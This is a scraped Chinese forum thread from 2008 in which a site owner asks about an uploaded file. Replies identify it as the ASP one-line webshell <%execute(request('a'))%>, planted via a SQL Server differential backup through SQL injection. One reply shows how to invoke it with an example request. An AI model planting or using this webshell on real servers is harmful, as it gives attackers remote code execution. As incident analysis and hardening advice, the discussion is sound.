28,409
社区成员
发帖
与我相关
我的任务
分享请问这种木马代码是如何加密的,用啥能解密
有人传木马上我空间,有谁能帮我看下这是如何加密的
我想看下,代码内容,看看这代码是干吗的
头1行:
TAPE??咊,^a <Microsoft SQL ServerSPAD^LSFMB 8曀`SSETd?za <
中间一段
?/8
/?
{@T?8/?ΥQ?
/?8
/?
?T?8/?ΥQ?/?8/?ΥQ?B/?8
/?
{S?8/?ΥQ/?8
/?T?4/?ΥQFt/??D
我想看下,代码内容,看看这代码是干吗的
头1行:
TAPE??咊,^a <Microsoft SQL ServerSPAD^LSFMB 8曀`SSETd?za <
中间一段
?/8
/?
{@T?8/?ΥQ?
/?8
/?
?T?8/?ΥQ?/?8/?ΥQ?B/?8
/?
{S?8/?ΥQ/?8
/?T?4/?ΥQFt/??D
...全文
请发表友善的回复…
发表回复
gingerkang 2008-04-09
- 打赏
- 举报
[Quote=引用 6 楼 chinmo 的回复:]
这个兄弟说得不错
看来也是很熟悉的啊
[/Quote]
对此以前就有所了解,在baidu,google上搜索也会有很多相关的文章介绍.
问题出来web服务和sqlserver服务共用一台服务器,而且sqlserver分配的帐号权限给得太大,dbo就已经具备备份数据库的权限,一个虚拟主机用到了该权限的帐号,只要该站点存在注入,这台服务器的所有站点都是鱼肉了.
这个兄弟说得不错
看来也是很熟悉的啊
[/Quote]
对此以前就有所了解,在baidu,google上搜索也会有很多相关的文章介绍.
问题出来web服务和sqlserver服务共用一台服务器,而且sqlserver分配的帐号权限给得太大,dbo就已经具备备份数据库的权限,一个虚拟主机用到了该权限的帐号,只要该站点存在注入,这台服务器的所有站点都是鱼肉了.
Atai-Lu 2008-04-09
- 打赏
- 举报
看不懂,哎~
一把编程的菜刀 2008-04-09
- 打赏
- 举报
[Quote=引用 2 楼 gingerkang 的回复:]
<%execute(request("a"))%>
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
[/Quote]
这个兄弟说得不错
看来也是很熟悉的啊
<%execute(request("a"))%>
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
[/Quote]
这个兄弟说得不错
看来也是很熟悉的啊
liyong888_8 2008-04-09
- 打赏
- 举报
jf
hookee 2008-04-09
- 打赏
- 举报
主要是生成的asp文件注入了<%execute(request("a"))%>,前后的字符都没有关系
访问的时候可以 1.asp?a=asp代码 的方式
比如 1.asp?a=response.write(server.mappath("/")):response.end
访问的时候可以 1.asp?a=asp代码 的方式
比如 1.asp?a=response.write(server.mappath("/")):response.end
black__art 2008-04-09
- 打赏
- 举报
呵呵,JF
gingerkang 2008-04-08
- 打赏
- 举报
<%execute(request("a"))%>
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
XUZIFENG 2008-04-08
- 打赏
- 举报
对了 中间还有这类的
P
^/?/?睶(/?�TT? <%execute(request("a"))%>爆鹣`8?`8?`鹣`鹣`P爆\爆o5J4
c/?#a`P�"睶3築栳@tAllocate RootD/?
"睶?(/??`/D/?
"睶?c/??pX/?
我运行这些代码出错 说
Microsoft VBScript 运行时错误 (0x800A000D)
类型不匹配: 'execute'
/1.asp, 第 33 行
P
^/?/?睶(/?�TT? <%execute(request("a"))%>爆鹣`8?`8?`鹣`鹣`P爆\爆o5J4
c/?#a`P�"睶3築栳@tAllocate RootD/?
"睶?(/??`/D/?
"睶?c/??pX/?
我运行这些代码出错 说
Microsoft VBScript 运行时错误 (0x800A000D)
类型不匹配: 'execute'
/1.asp, 第 33 行
